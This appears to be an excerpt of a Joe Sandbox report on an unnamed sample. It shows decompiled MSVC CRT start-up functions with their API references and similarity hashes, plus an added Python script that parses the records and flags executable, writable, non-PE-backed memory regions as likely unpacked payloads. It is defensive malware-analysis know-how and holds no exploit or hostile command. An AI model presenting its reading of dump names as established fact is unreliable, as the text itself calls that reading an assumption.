                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 5b20e79d1a927e48ccf117fc0330391a185a2dbfaf5f0153d9a719a32ce762bf
                                                                          • Instruction ID: 9cbd6caa4818d8813f00091b1a8dbd068b989d57c79018f53bc1486fdcccaeab
                                                                          • Opcode Fuzzy Hash: 5b20e79d1a927e48ccf117fc0330391a185a2dbfaf5f0153d9a719a32ce762bf
                                                                          • Instruction Fuzzy Hash: 77B09231444308ABCB002F91EC19B68BF39FB04652F088010F60DC4274CF625410CEAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
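
                                                                          Every function entry on this page, the similarity-only records above and the decompiled ones under "Non-executed Functions" alike, follows one flat layout: a Memory Dump Source line naming the .sdmp the function was lifted from and whether that dump is backed by a PE file on disk, optionally an APIs list and Associated dumps, then the Similarity identifiers and a Uniqueness Score. The security-relevant detail in that layout is which functions live in memory with no PE behind it. The regions at 03420000 and 05CA0000 are marked "based on PE: false" and their dump names carry 00000040 in the fifth dotted field, which is PAGE_EXECUTE_READWRITE if that field is the page protection; that reading is an assumption, but it is consistent with every dump on this page (the .text dump carries 00000020, the header and .rdata dumps 00000002, the .data dump 00000004). Writable, executable memory that is not an image section is what a packer or loader leaves behind, so those regions are the place to start when extracting the unpacked payload, while PE-backed records such as the SetUnhandledExceptionFilter wrapper are CRT start-up code that can be filtered out by API ID. The Python below is an added example written for this page, not code from Joe Sandbox or its IDA plugin: it parses records in this layout, decodes the dump name under the assumption just stated, collapses repeated Opcode IDs and flags non-PE-backed RWX regions. The two input records are copied from this report, "Download File" link text included.

```python
import re
from collections import defaultdict

# Constructed input: two records copied from this report, one from the RWX region at
# 03420000 ("based on PE: false") and one from the sample's own .text section, with
# the "Download File" link text the HTML export leaves on the Associated line.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
• API ID:
• API String ID:
• Opcode ID: 2df31e6370f5c8052a820a3387860ba474bc8cb084cf16d437b030b7cc54e56a
• Instruction Fuzzy Hash: 0FE01A71A45209ABC780DFB4D99A69EBBF5EB45204F5045A9D508E3210EE715E048782

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DF3AF2,?,?,?,00000000), ref: 00DF2981
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00DF298A
Memory Dump Source
• Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: 5b20e79d1a927e48ccf117fc0330391a185a2dbfaf5f0153d9a719a32ce762bf
• Instruction Fuzzy Hash: 77B09231444308ABCB002F91EC19B68BF39FB04652F088010F60DC4274CF625410CEAA

Uniqueness Score: -1.00%
"""

SOURCE_RE = re.compile(r"Source File: (?P<dump>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")
SCORE_RE = re.compile(r"Uniqueness Score: (?P<score>-?[0-9.]+)%")

# Windows PAGE_* protection constants (winnt.h).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_records(text):
    """One dict per function. A record closes at its 'Uniqueness Score' line,
    so a half-record at the end of a truncated export is dropped, not guessed."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = {"apis": [], "associated": []}
        if m := SOURCE_RE.search(line):
            cur.update(dump=m["dump"], offset=int(m["off"], 16), based_on_pe=m["pe"] == "true")
        elif m := API_RE.match(line):
            cur["apis"].append({"name": m["name"], "module": m["module"], "ref": int(m["ref"], 16)})
        elif m := SCORE_RE.search(line):
            cur["uniqueness"] = float(m["score"])
            records.append(cur)
            cur = None
        elif m := FIELD_RE.match(line):
            key = m["key"].strip().lower().replace(" ", "_")
            val = m["val"].removesuffix("Download File").strip()  # drop HTML-export residue
            if key == "associated":
                cur["associated"].append(val)
            else:
                cur[key] = val
    return records


def decode_dump_name(name):
    """Assumption: dumps are named <proc>.<stage>.<id>.<base>.<protect>.<type>.sdmp and
    the fifth field is the Windows page protection (it matches PAGE_* for every dump here)."""
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) != 6:
        raise ValueError(f"unexpected dump name: {name}")
    proc, stage, _dump_id, base, protect, _mem_type = parts
    prot = int(protect, 16)
    return {"proc": int(proc, 16), "stage": int(stage, 16), "base": int(base, 16),
            "protect": prot, "protect_name": PAGE_PROTECT.get(prot & 0xFF, f"0x{prot:x}"),
            "executable": bool(prot & 0xF0), "writable": bool(prot & 0xCC)}


def triage(records):
    """Group functions by dump region, collapse repeated Opcode IDs, and flag regions
    that are executable, writable and not backed by a PE on disk: the usual home of
    unpacked or injected code, and the first dump to pull out of the sandbox."""
    by_region, seen = defaultdict(list), set()
    for rec in records:
        if rec.get("opcode_id") in seen:
            continue
        seen.add(rec.get("opcode_id"))
        by_region[rec["dump"]].append(rec)
    report = []
    for dump, funcs in by_region.items():
        meta = decode_dump_name(dump)
        backed = funcs[0]["based_on_pe"]
        report.append({"dump": dump, "base": meta["base"], "protect": meta["protect_name"],
                       "based_on_pe": backed, "functions": len(funcs),
                       "api_ids": sorted({f["api_id"] for f in funcs if f.get("api_id")}),
                       "unpacked_candidate": meta["executable"] and meta["writable"] and not backed})
    return sorted(report, key=lambda r: r["base"])
```

                                                                          Feed the whole report text, not just the two records embedded above, to parse_records and pass the result to triage; regions with unpacked_candidate set are the ones to carve and scan, and records whose api_ids are CRT start-up names (ExceptionFilterUnhandled, HeapProcess) can be dropped before spending analyst time on them.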

                                                                          C-Code - Quality: 100%
                                                                          			E00DF2959(_Unknown_base(*)()* _a4) {
                                                                          
                                                                          				return SetUnhandledExceptionFilter(_a4);
                                                                          			}




                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?,?,00DF154D,00DF1502), ref: 00DF295F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: ff75f31c867011ec2d082eeabef7a7e91713ff692949dabf7cc76aea2570f47c
                                                                          • Instruction ID: b070fe18aae53bbf3c28c5c903c073981c363e8e66b3af61ef17324c4bbd7cd2
                                                                          • Opcode Fuzzy Hash: ff75f31c867011ec2d082eeabef7a7e91713ff692949dabf7cc76aea2570f47c
                                                                          • Instruction Fuzzy Hash: 70A0123000020CA78B001F41EC045547F2DE6001507004010F40C80120CB225410C995
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00DF1EBA() {
                                                                          				void* _t3;
                                                                          
                                                                          				_t3 = GetProcessHeap();
                                                                          				 *0xe00790 = _t3;
                                                                          				return 0 | _t3 != 0x00000000;
                                                                          			}





                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00DF12BE,00DFD6E0,00000014), ref: 00DF1EBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 40809a5312175c9f0239278c276055130e51559634ad8bf1157bdb2ce9ff67e0
                                                                          • Instruction ID: ba943b6465401ac585d1be575a1d51779f5ba32aba19679f88f1ac23ca29d783
                                                                          • Opcode Fuzzy Hash: 40809a5312175c9f0239278c276055130e51559634ad8bf1157bdb2ce9ff67e0
                                                                          • Instruction Fuzzy Hash: 02B012B07012028FCB084F39BC2531977D4A70C111704803E7007C1760DF308450DF10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 84%
                                                                          			E00DF1ECF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				signed int _t80;
                                                                          				signed int _t84;
                                                                          				long _t88;
                                                                          				signed int _t92;
                                                                          				signed int _t96;
                                                                          				signed int _t97;
                                                                          				signed char _t101;
                                                                          				signed int _t103;
                                                                          				intOrPtr _t104;
                                                                          				intOrPtr* _t107;
                                                                          				signed char _t109;
                                                                          				long _t117;
                                                                          				signed int _t126;
                                                                          				signed int _t130;
                                                                          				signed int _t131;
                                                                          				signed int _t134;
                                                                          				void** _t135;
                                                                          				signed int _t137;
                                                                          				void* _t138;
                                                                          				signed int _t139;
                                                                          				void** _t143;
                                                                          				signed int _t145;
                                                                          				void* _t146;
                                                                          				signed int _t150;
                                                                          				void* _t151;
                                                                          
                                                                          				_push(0x64);
                                                                          				_push(0xdfd770);
                                                                          				E00DF2A00(__ebx, __edi, __esi);
                                                                          				E00DF2C8D(0xb);
                                                                          				_t126 = 0;
                                                                          				 *(_t151 - 4) = 0;
                                                                          				_push(0x40);
                                                                          				_t137 = 0x20;
                                                                          				_push(_t137);
                                                                          				_t80 = E00DF2E3E();
                                                                          				_t130 = _t80;
                                                                          				 *(_t151 - 0x24) = _t130;
                                                                          				if(_t130 != 0) {
                                                                          					 *0xe00798 = _t80;
                                                                          					 *0xe01c74 = _t137;
                                                                          					while(1) {
                                                                          						__eflags = _t130 - _t80 + 0x800;
                                                                          						if(_t130 >= _t80 + 0x800) {
                                                                          							break;
                                                                          						}
                                                                          						 *((short*)(_t130 + 4)) = 0xa00;
                                                                          						 *_t130 =  *_t130 | 0xffffffff;
                                                                          						 *(_t130 + 8) = _t126;
                                                                          						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x00000080;
                                                                          						 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0x0000007f;
                                                                          						 *((short*)(_t130 + 0x25)) = 0xa0a;
                                                                          						 *(_t130 + 0x38) = _t126;
                                                                          						 *(_t130 + 0x34) = _t126;
                                                                          						_t130 = _t130 + 0x40;
                                                                          						 *(_t151 - 0x24) = _t130;
                                                                          						_t80 =  *0xe00798; // 0x17da618
                                                                          					}
                                                                          					GetStartupInfoW(_t151 - 0x74);
                                                                          					__eflags =  *((short*)(_t151 - 0x42));
                                                                          					if( *((short*)(_t151 - 0x42)) == 0) {
                                                                          						while(1) {
                                                                          							L27:
                                                                          							 *(_t151 - 0x2c) = _t126;
                                                                          							__eflags = _t126 - 3;
                                                                          							if(_t126 >= 3) {
                                                                          								break;
                                                                          							}
                                                                          							_t143 = (_t126 << 6) +  *0xe00798;
                                                                          							 *(_t151 - 0x24) = _t143;
                                                                          							__eflags =  *_t143 - 0xffffffff;
                                                                          							if( *_t143 == 0xffffffff) {
                                                                          								L31:
                                                                          								_t143[1] = 0x81;
                                                                          								__eflags = _t126;
                                                                          								if(_t126 != 0) {
                                                                          									_t65 = _t126 - 1; // -1
                                                                          									asm("sbb eax, eax");
                                                                          									_t88 =  ~_t65 + 0xfffffff5;
                                                                          									__eflags = _t88;
                                                                          								} else {
                                                                          									_t88 = 0xfffffff6;
                                                                          								}
                                                                          								_t138 = GetStdHandle(_t88);
                                                                          								__eflags = _t138 - 0xffffffff;
                                                                          								if(_t138 == 0xffffffff) {
                                                                          									L43:
                                                                          									_t143[1] = _t143[1] | 0x00000040;
                                                                          									 *_t143 = 0xfffffffe;
                                                                          									_t92 =  *0xe00bbc; // 0x0
                                                                          									__eflags = _t92;
                                                                          									if(_t92 != 0) {
                                                                          										 *( *((intOrPtr*)(_t92 + _t126 * 4)) + 0x10) = 0xfffffffe;
                                                                          									}
                                                                          									goto L45;
                                                                          								} else {
                                                                          									__eflags = _t138;
                                                                          									if(_t138 == 0) {
                                                                          										goto L43;
                                                                          									}
                                                                          									_t96 = GetFileType(_t138);
                                                                          									__eflags = _t96;
                                                                          									if(_t96 == 0) {
                                                                          										goto L43;
                                                                          									}
                                                                          									 *_t143 = _t138;
                                                                          									_t97 = _t96 & 0x000000ff;
                                                                          									__eflags = _t97 - 2;
                                                                          									if(_t97 != 2) {
                                                                          										__eflags = _t97 - 3;
                                                                          										if(_t97 != 3) {
                                                                          											L42:
                                                                          											_t69 =  &(_t143[3]); // -14681996
                                                                          											InitializeCriticalSectionAndSpinCount(_t69, 0xfa0);
                                                                          											_t143[2] = _t143[2] + 1;
                                                                          											L45:
                                                                          											_t126 = _t126 + 1;
                                                                          											continue;
                                                                          										}
                                                                          										_t101 = _t143[1] | 0x00000008;
                                                                          										__eflags = _t101;
                                                                          										L41:
                                                                          										_t143[1] = _t101;
                                                                          										goto L42;
                                                                          									}
                                                                          									_t101 = _t143[1] | 0x00000040;
                                                                          									goto L41;
                                                                          								}
                                                                          							}
                                                                          							__eflags =  *_t143 - 0xfffffffe;
                                                                          							if( *_t143 == 0xfffffffe) {
                                                                          								goto L31;
                                                                          							}
                                                                          							_t143[1] = _t143[1] | 0x00000080;
                                                                          							goto L45;
                                                                          						}
                                                                          						 *(_t151 - 4) = 0xfffffffe;
                                                                          						E00DF2174();
                                                                          						_t84 = 0;
                                                                          						__eflags = 0;
                                                                          						L47:
                                                                          						return E00DF2A45(_t84);
                                                                          					}
                                                                          					_t103 =  *(_t151 - 0x40);
                                                                          					__eflags = _t103;
                                                                          					if(_t103 == 0) {
                                                                          						goto L27;
                                                                          					}
                                                                          					_t131 =  *_t103;
                                                                          					 *(_t151 - 0x1c) = _t131;
                                                                          					_t104 = _t103 + 4;
                                                                          					 *((intOrPtr*)(_t151 - 0x28)) = _t104;
                                                                          					 *(_t151 - 0x20) = _t104 + _t131;
                                                                          					__eflags = _t131 - 0x800;
                                                                          					if(_t131 >= 0x800) {
                                                                          						_t131 = 0x800;
                                                                          						 *(_t151 - 0x1c) = 0x800;
                                                                          					}
                                                                          					_t145 = 1;
                                                                          					__eflags = 1;
                                                                          					 *(_t151 - 0x30) = 1;
                                                                          					while(1) {
                                                                          						__eflags =  *0xe01c74 - _t131; // 0x20
                                                                          						if(__eflags >= 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t134 = E00DF2E3E(_t137, 0x40);
                                                                          						 *(_t151 - 0x24) = _t134;
                                                                          						__eflags = _t134;
                                                                          						if(_t134 != 0) {
                                                                          							0xe00798[_t145] = _t134;
                                                                          							 *0xe01c74 =  *0xe01c74 + _t137;
                                                                          							__eflags =  *0xe01c74;
                                                                          							while(1) {
                                                                          								__eflags = _t134 - 0xe00798[_t145] + 0x800;
                                                                          								if(_t134 >= 0xe00798[_t145] + 0x800) {
                                                                          									break;
                                                                          								}
                                                                          								 *((short*)(_t134 + 4)) = 0xa00;
                                                                          								 *_t134 =  *_t134 | 0xffffffff;
                                                                          								 *(_t134 + 8) = _t126;
                                                                          								 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                                          								 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                                          								 *(_t134 + 0x38) = _t126;
                                                                          								 *(_t134 + 0x34) = _t126;
                                                                          								_t134 = _t134 + 0x40;
                                                                          								 *(_t151 - 0x24) = _t134;
                                                                          							}
                                                                          							_t145 = _t145 + 1;
                                                                          							 *(_t151 - 0x30) = _t145;
                                                                          							_t131 =  *(_t151 - 0x1c);
                                                                          							continue;
                                                                          						}
                                                                          						_t131 =  *0xe01c74; // 0x20
                                                                          						 *(_t151 - 0x1c) = _t131;
                                                                          						break;
                                                                          					}
                                                                          					_t139 = _t126;
                                                                          					 *(_t151 - 0x2c) = _t139;
                                                                          					_t107 =  *((intOrPtr*)(_t151 - 0x28));
                                                                          					_t135 =  *(_t151 - 0x20);
                                                                          					while(1) {
                                                                          						__eflags = _t139 - _t131;
                                                                          						if(_t139 >= _t131) {
                                                                          							goto L27;
                                                                          						}
                                                                          						_t146 =  *_t135;
                                                                          						__eflags = _t146 - 0xffffffff;
                                                                          						if(_t146 == 0xffffffff) {
                                                                          							L22:
                                                                          							_t139 = _t139 + 1;
                                                                          							 *(_t151 - 0x2c) = _t139;
                                                                          							_t107 =  *((intOrPtr*)(_t151 - 0x28)) + 1;
                                                                          							 *((intOrPtr*)(_t151 - 0x28)) = _t107;
                                                                          							_t135 =  &(_t135[1]);
                                                                          							 *(_t151 - 0x20) = _t135;
                                                                          							continue;
                                                                          						}
                                                                          						__eflags = _t146 - 0xfffffffe;
                                                                          						if(_t146 == 0xfffffffe) {
                                                                          							goto L22;
                                                                          						}
                                                                          						_t109 =  *_t107;
                                                                          						__eflags = _t109 & 0x00000001;
                                                                          						if((_t109 & 0x00000001) == 0) {
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _t109 & 0x00000008;
                                                                          						if((_t109 & 0x00000008) != 0) {
                                                                          							L20:
                                                                          							_t150 = ((_t139 & 0x0000001f) << 6) + 0xe00798[_t139 >> 5];
                                                                          							 *(_t151 - 0x24) = _t150;
                                                                          							 *_t150 =  *_t135;
                                                                          							 *((char*)(_t150 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t151 - 0x28))));
                                                                          							_t37 = _t150 + 0xc; // 0xd
                                                                          							InitializeCriticalSectionAndSpinCount(_t37, 0xfa0);
                                                                          							_t38 = _t150 + 8;
                                                                          							 *_t38 =  *(_t150 + 8) + 1;
                                                                          							__eflags =  *_t38;
                                                                          							_t135 =  *(_t151 - 0x20);
                                                                          							L21:
                                                                          							_t131 =  *(_t151 - 0x1c);
                                                                          							goto L22;
                                                                          						}
                                                                          						_t117 = GetFileType(_t146);
                                                                          						_t135 =  *(_t151 - 0x20);
                                                                          						__eflags = _t117;
                                                                          						if(_t117 == 0) {
                                                                          							goto L21;
                                                                          						}
                                                                          						goto L20;
                                                                          					}
                                                                          					goto L27;
                                                                          				}
                                                                          				_t84 = E00DF4540(_t151, 0xdff000, _t151 - 0x10, 0xfffffffe) | 0xffffffff;
                                                                          				goto L47;
                                                                          			}
                                                                          0x00df1fb9
                                                                          0x00df1fbb
                                                                          0x00df204f
                                                                          0x00df2056
                                                                          0x00df2056
                                                                          0x00df205c
                                                                          0x00df2068
                                                                          0x00df206a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df206c
                                                                          0x00df2072
                                                                          0x00df2075
                                                                          0x00df2078
                                                                          0x00df207c
                                                                          0x00df2082
                                                                          0x00df2085
                                                                          0x00df2088
                                                                          0x00df208b
                                                                          0x00df208b
                                                                          0x00df2090
                                                                          0x00df2091
                                                                          0x00df2094
                                                                          0x00000000
                                                                          0x00df2094
                                                                          0x00df1fc1
                                                                          0x00df1fc7
                                                                          0x00000000
                                                                          0x00df1fc7
                                                                          0x00df1fca
                                                                          0x00df1fcc
                                                                          0x00df1fcf
                                                                          0x00df1fd2
                                                                          0x00df1fd5
                                                                          0x00df1fd5
                                                                          0x00df1fd7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fdd
                                                                          0x00df1fdf
                                                                          0x00df1fe2
                                                                          0x00df203c
                                                                          0x00df203c
                                                                          0x00df203d
                                                                          0x00df2043
                                                                          0x00df2044
                                                                          0x00df2047
                                                                          0x00df204a
                                                                          0x00000000
                                                                          0x00df204a
                                                                          0x00df1fe4
                                                                          0x00df1fe7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fe9
                                                                          0x00df1feb
                                                                          0x00df1fed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fef
                                                                          0x00df1ff1
                                                                          0x00df2001
                                                                          0x00df200e
                                                                          0x00df2015
                                                                          0x00df201a
                                                                          0x00df2021
                                                                          0x00df2029
                                                                          0x00df202d
                                                                          0x00df2033
                                                                          0x00df2033
                                                                          0x00df2033
                                                                          0x00df2036
                                                                          0x00df2039
                                                                          0x00df2039
                                                                          0x00000000
                                                                          0x00df2039
                                                                          0x00df1ff4
                                                                          0x00df1ffa
                                                                          0x00df1ffd
                                                                          0x00df1fff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df1fff
                                                                          0x00000000
                                                                          0x00df1fd5
                                                                          0x00df1f11
                                                                          0x00000000

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00DF1EDD
                                                                            • Part of subcall function 00DF2C8D: __mtinitlocknum.LIBCMT ref: 00DF2C9F
                                                                            • Part of subcall function 00DF2C8D: EnterCriticalSection.KERNEL32(00000000,?,00DF18B3,0000000D), ref: 00DF2CB8
                                                                          • __calloc_crt.LIBCMT ref: 00DF1EEE
                                                                            • Part of subcall function 00DF2E3E: __calloc_impl.LIBCMT ref: 00DF2E4D
                                                                            • Part of subcall function 00DF2E3E: Sleep.KERNEL32(00000000), ref: 00DF2E64
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00DF1F09
                                                                          • GetStartupInfoW.KERNEL32(?,00DFD770,00000064,00DF12E9,00DFD6E0,00000014), ref: 00DF1F62
                                                                          • __calloc_crt.LIBCMT ref: 00DF1FAD
                                                                          • GetFileType.KERNEL32(00000001), ref: 00DF1FF4
                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00DF202D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 1426640281-0
                                                                          • Opcode ID: 4f2398be6275b9c1705eeeff8138d6e696e8125b8bbb769769ea7e5089076b71
                                                                          • Instruction ID: 6a32de12a601b3f116e6257f0b98f217f4cb0c4f836f25158ad55826dd5f58ff
                                                                          • Opcode Fuzzy Hash: 4f2398be6275b9c1705eeeff8138d6e696e8125b8bbb769769ea7e5089076b71
                                                                          • Instruction Fuzzy Hash: C78190719053498FDB24CF68C8406B9BBF0AF09324B29825DD6A6AB3D1CB35D842CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			// Decompiler output. The call sequence (__init_pointers, __mtinitlocks,
                                                                          			// __mtterm, __calloc_crt(1, 0x3bc), GetCurrentThreadId) matches the MSVC
                                                                          			// CRT routine __mtinit: allocate the per-thread data block (_tiddata),
                                                                          			// store it in an FLS slot and record the thread id. This is CRT start-up
                                                                          			// boilerplate, not sample-specific logic; the symbol names in the
                                                                          			// comments are identifications from the CRT source, not from the report.
                                                                          			E00DF191D(void* __ebx, void* __edi, void* __eflags) {
                                                                          				void* __esi;
                                                                          				void* _t3;
                                                                          				intOrPtr _t6;
                                                                          				long _t14;
                                                                          				long* _t27;
                                                                          
                                                                          				E00DF1AD7(_t3);                           // __init_pointers()
                                                                          				if(E00DF2DBC() != 0) {                    // __mtinitlocks()
                                                                          					_t6 = E00DF263D(E00DF16AC);           // __fls_alloc(&__freefls)
                                                                          					 *0xdff008 = _t6;                     // __flsindex
                                                                          					__eflags = _t6 - 0xffffffff;
                                                                          					if(_t6 == 0xffffffff) {               // FLS_OUT_OF_INDEXES
                                                                          						goto L1;
                                                                          					} else {
                                                                          						_t27 = E00DF2E3E(1, 0x3bc);       // __calloc_crt(1, sizeof _tiddata)
                                                                          						__eflags = _t27;
                                                                          						if(_t27 == 0) {
                                                                          							L6:
                                                                          							E00DF1993();                  // __mtterm()
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						} else {
                                                                          							__eflags = E00DF2699( *0xdff008, _t27);   // __fls_setvalue(__flsindex, ptd)
                                                                          							if(__eflags == 0) {
                                                                          								goto L6;
                                                                          							} else {
                                                                          								_push(0);
                                                                          								_push(_t27);
                                                                          								E00DF186A(__ebx, __edi, _t27, __eflags);  // _initptd(ptd, NULL)
                                                                          								_t14 = GetCurrentThreadId();
                                                                          								_t27[1] = _t27[1] | 0xffffffff;           // ptd->_thandle = (uintptr_t)-1
                                                                          								 *_t27 = _t14;                            // ptd->_tid
                                                                          								__eflags = 1;
                                                                          								return 1;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L1:
                                                                          					E00DF1993();                          // __mtterm()
                                                                          					return 0;
                                                                          				}
                                                                          			}
                                                                          
                                                                          Instruction address column for the C-code above: addresses run from 0x00df191d to 0x00df1992, with 0x00000000 for lines that have no mapped instruction.

                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 00DF191D
                                                                            • Part of subcall function 00DF1AD7: RtlEncodePointer.NTDLL(00000000,?,00DF1922,00DF12CF,00DFD6E0,00000014), ref: 00DF1ADA
                                                                            • Part of subcall function 00DF1AD7: __initp_misc_winsig.LIBCMT ref: 00DF1AFB
                                                                            • Part of subcall function 00DF1AD7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DF2721
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DF2735
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DF2748
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DF275B
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DF276E
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DF2781
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DF2794
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00DF27A7
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DF27BA
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DF27CD
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DF27E0
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DF27F3
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DF2806
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DF2819
                                                                            • Part of subcall function 00DF1AD7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DF282C
